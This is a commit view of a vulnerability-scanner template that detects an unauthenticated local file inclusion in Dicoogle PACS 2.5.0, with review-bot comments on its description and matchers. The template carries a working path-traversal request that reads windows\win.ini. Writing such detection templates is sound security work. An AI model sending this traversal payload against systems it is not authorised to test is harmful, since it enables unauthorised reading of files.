Update and rename dicoogle-pacs-lfi.yaml to vulnerabilities/other/dicoogle-pacs-lfi.yaml

patch-1
Prince Chaddha 2021-12-24 19:23:04 +05:30 committed by GitHub
parent 439a1e966a
commit 0ddd4c7911
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 4 additions and 3 deletions


@ -5,7 +5,9 @@ info:
author: 0x_akoko
severity: high
description: In version 2.5.0, it is vulnerable to local file inclusion. This allows an attacker to read arbitrary files that the web user has access to. Admin credentials aren't required.
reference: https://cxsecurity.com/issue/WLB-2018070131
reference:
- https://cxsecurity.com/issue/WLB-2018070131
- http://www.dicoogle.com/home
tags: windows,lfi,dicoogle
requests:
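Review bot: The `description` line opens with "In version 2.5.0, it is vulnerable" and never names the product, so it reads ambiguously wherever the description is shown without the template id (scan output, reports). Suggest naming it, for example "Dicoogle PACS 2.5.0 is vulnerable to local file inclusion." In the `reference` list, `http://www.dicoogle.com/home` is the product home page rather than an advisory for this issue; keep it only if it is meant as a vendor pointer.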
@ -13,12 +15,11 @@ requests:
path:
- "{{BaseURL}}/exportFile?UID=..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini"
stop-at-first-match: true
matchers:
- type: word
part: body
words:
- "bit app support"
- "fonts"
- "extensions"
condition: and
part: body
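Review bot: The `matchers` block has a single `word` matcher on the body and no status check, so any response that happens to contain "bit app support", "fonts" and "extensions" counts as a hit, including an error page. Suggest adding a `status` matcher for 200 and setting `matchers-condition: and` so both must hold. Separately, `stop-at-first-match: true` has no effect while `path` carries the single entry visible here, so it can be dropped unless more paths are planned.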